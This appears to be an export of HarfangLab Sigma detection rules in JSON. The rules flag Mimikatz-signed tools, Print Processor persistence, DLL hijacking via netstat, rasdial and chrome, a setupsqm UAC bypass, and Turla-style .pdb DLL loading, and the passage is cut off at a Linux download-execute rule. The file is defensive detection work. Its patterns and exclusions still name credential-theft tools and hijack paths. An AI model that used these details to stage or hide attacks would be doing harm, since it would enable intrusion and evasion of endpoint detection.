"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz"
],
"name": "gentilkiwi_signed_tool.yml",
"content": "title: Gentilkiwi Signed Tool Executed\nid: 541b8dbb-5c51-45c6-a1c0-c427bc3f566d\ndescription: |\n Detects the execution of a binary signed by gentilkiwi.\n Gentilkiwi is a developer known for developing popular offensive security tooling, such as Mimikatz, which focuses on credential access and lateral movement.\n It is recommended to determine if this tooling is expected in your environment at this time, for instance, in the case of a security audit. If not, investigate activity around this action to determine maliciousness.\nreferences:\n - https://github.com/gentilkiwi/mimikatz\ndate: 2021/03/03\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Signature|contains: 'Open Source Developer, Benjamin Delpy'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "541b8dbb-5c51-45c6-a1c0-c427bc3f566d",
"rule_name": "Gentilkiwi Signed Tool Executed",
"rule_description": "Detects the execution of a binary signed by gentilkiwi.\nGentilkiwi is a developer known for developing popular offensive security tooling, such as Mimikatz, which focuses on credential access and lateral movement.\nIt is recommended to determine if this tooling is expected in your environment at this time, for instance, in the case of a security audit. If not, investigate activity around this action to determine maliciousness.\n",
"rule_creation_date": "2021-03-03",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "544c6c30-5199-4f81-849a-17bf35c61857",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075498Z",
"creation_date": "2026-03-23T11:45:34.075500Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075504Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/012/"
],
"name": "t1547_012_persistence_registry_print_processors.yml",
"content": "title: Print Processor Persistence Added\nid: 544c6c30-5199-4f81-849a-17bf35c61857\ndescription: |\n Detects the installation of a new Print Processor on the system.\n Print Processors are DLLs that are loaded by the print spooler service at startup, with local admin privileges.\n Adversaries can register a malicious Print Processor to establish persistence, as the registered DLL will be loaded in spoolsv.exe whenever the system starts.\n It is recommended to investigate the registered DLL located in the Processor Directory (usually \"C:\\Windows\\system32\\spool\\PRTPROCS\\x64\").\nreferences:\n - https://attack.mitre.org/techniques/T1547/012/\ndate: 2024/08/24\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrintSpooler\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n TargetObject: 'HKLM\\SYSTEM\\\\*ControlSet*\\Control\\Print\\Environments\\Windows*\\Print Processors\\\\*'\n EventType: 'SetValue'\n\n filter_empty:\n Details:\n - ''\n - '(empty)'\n\n filter_spoolsv:\n ProcessImage: '?:\\Windows\\System32\\spoolsv.exe'\n\n exclusion_applidis:\n Details: 'AdisPrintProcessor64.dll'\n ProcessSigned: 'true'\n ProcessImage:\n - '?:\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\Printer\\AddClearUPrinter.exe'\n - '?:\\Program Files\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\Printer\\AddClearUPrinter.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "544c6c30-5199-4f81-849a-17bf35c61857",
"rule_name": "Print Processor Persistence Added",
"rule_description": "Detects the installation of a new Print Processor on the system.\nPrint Processors are DLLs that are loaded by the print spooler service at startup, with local admin privileges.\nAdversaries can register a malicious Print Processor to establish persistence, as the registered DLL will be loaded in spoolsv.exe whenever the system starts.\nIt is recommended to investigate the registered DLL located in the Processor Directory (usually \"C:\\Windows\\system32\\spool\\PRTPROCS\\x64\").\n",
"rule_creation_date": "2024-08-24",
"rule_modified_date": "2025-02-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5458adb2-cb54-4163-a842-5b08a8b9f5de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078881Z",
"creation_date": "2026-03-23T11:45:34.078884Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078888Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netstat.yml",
"content": "title: DLL Hijacking via netstat.exe\nid: 5458adb2-cb54-4163-a842-5b08a8b9f5de\ndescription: |\n Detects potential Windows DLL Hijacking via netstat.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netstat.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\snmpapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5458adb2-cb54-4163-a842-5b08a8b9f5de",
"rule_name": "DLL Hijacking via netstat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netstat.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "545a880e-352c-4108-bf6a-4ac36129b177",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084551Z",
"creation_date": "2026-03-23T11:45:34.084553Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084557Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html"
],
"name": "t1548_002_uac_bypass_setupsqm.yml",
"content": "title: UAC Bypass Executed via setupsqm.exe\nid: 545a880e-352c-4108-bf6a-4ac36129b177\ndescription: |\n Detects the setupsqm.exe process loading an unsigned wdscore.dll, which may be indicative of an UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the loaded DLL and user session responsible to look for malicious content or actions.\nreferences:\n - http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html\ndate: 2020/09/18\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\Windows\\System32\\oobe\\setupsqm.exe'\n ImageLoaded: '*\\Windows\\System32\\oobe\\wdscore.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "545a880e-352c-4108-bf6a-4ac36129b177",
"rule_name": "UAC Bypass Executed via setupsqm.exe",
"rule_description": "Detects the setupsqm.exe process loading an unsigned wdscore.dll, which may be indicative of an UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the loaded DLL and user session responsible to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-18",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5467392a-8c65-4290-9a1d-1c185c05f1fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608305Z",
"creation_date": "2026-03-23T11:45:34.608308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608315Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1204_002_suspicious_script_execution_officer_templates_folder.yml",
"content": "title: Suspicious Script Execution from Office Templates Folder\nid: 5467392a-8c65-4290-9a1d-1c185c05f1fb\ndescription: |\n Detects the execution of suspicious Windows scripts located in the Office templates folder.\n This technique was used by Trickbot to deploy OSTAP backdoor by dropping the JScript downloader in \"%AppData%\\Microsoft\\Templates\".\n It is recommended to investigate the activity performed by the process and the content of the script.\nreferences:\n - https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1059/\ndate: 2023/12/14\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'wscript.exe'\n - 'cscript.exe'\n CommandLine|contains: '\\Microsoft\\Templates\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5467392a-8c65-4290-9a1d-1c185c05f1fb",
"rule_name": "Suspicious Script Execution from Office Templates Folder",
"rule_description": "Detects the execution of suspicious Windows scripts located in the Office templates folder.\nThis technique was used by Trickbot to deploy OSTAP backdoor by dropping the JScript downloader in \"%AppData%\\Microsoft\\Templates\".\nIt is recommended to investigate the activity performed by the process and the content of the script.\n",
"rule_creation_date": "2023-12-14",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "548f2354-2b4d-4812-b5b4-b02aed0f2c12",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098508Z",
"creation_date": "2026-03-23T11:45:34.098510Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098514Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rasdial.yml",
"content": "title: DLL Hijacking via rasdial.exe\nid: 548f2354-2b4d-4812-b5b4-b02aed0f2c12\ndescription: |\n Detects potential Windows DLL Hijacking via rasdial.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rasdial.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\rtutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "548f2354-2b4d-4812-b5b4-b02aed0f2c12",
"rule_name": "DLL Hijacking via rasdial.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rasdial.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "54a59f85-d6f9-44be-80d9-753a6566f57d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079100Z",
"creation_date": "2026-03-23T11:45:34.079102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079107Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chrome.yml",
"content": "title: DLL Hijacking via chrome.exe\nid: 54a59f85-d6f9-44be-80d9-753a6566f57d\ndescription: |\n Detects potential Windows DLL Hijacking via chrome.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chrome.exe'\n ProcessSignature: 'Google LLC'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\explorerframe.dll'\n - '\\mswsock.dll'\n - '\\ntmarta.dll'\n - '\\propsys.dll'\n - '\\windows.storage.dll'\n - '\\dwmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "54a59f85-d6f9-44be-80d9-753a6566f57d",
"rule_name": "DLL Hijacking via chrome.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chrome.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "54a90583-1d04-484b-a12c-b7e9d9a557ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627810Z",
"creation_date": "2026-03-23T11:45:34.627812Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627817Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_suspicious_pdb_rundll.yml",
"content": "title: Suspicious DLL with a Program Database Extension Loaded via RunDLL32\nid: 54a90583-1d04-484b-a12c-b7e9d9a557ed\ndescription: |\n Detects a suspicious DLL load with a .pdb extension.\n This command is seen in Turla's Mosquito malware, which is commonly delivered through spearphishing attachments.\n The malware will place a DLL file with a \".pdb\" extension at a random or deep path in %APPDATA% and use RunDLL32.exe to load it.\n It is recommended to investigate the loaded pdb file, as well as other actions taken by the parent process.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/06\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - attack.initial_access\n - attack.t1566.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_cmd:\n CommandLine|contains: '.pdb'\n\n # This filter prevents false positives such as:\n # rundll32 toto.dll,function file.pdb\n filter_later_pdb:\n CommandLine|contains: '.dll* *.pdb'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "54a90583-1d04-484b-a12c-b7e9d9a557ed",
"rule_name": "Suspicious DLL with a Program Database Extension Loaded via RunDLL32",
"rule_description": "Detects a suspicious DLL load with a .pdb extension.\nThis command is seen in Turla's Mosquito malware, which is commonly delivered through spearphishing attachments.\nThe malware will place a DLL file with a \".pdb\" extension at a random or deep path in %APPDATA% and use RunDLL32.exe to load it.\nIt is recommended to investigate the loaded pdb file, as well as other actions taken by the parent process.\n",
"rule_creation_date": "2022-12-06",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1218.011",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "54eff1c1-eb8a-43c1-a752-478f492a2912",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625181Z",
"creation_date": "2026-03-23T11:45:34.625183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625187Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1222/002/"
],
"name": "t1105_linux_suspicious_download_execute.yml",
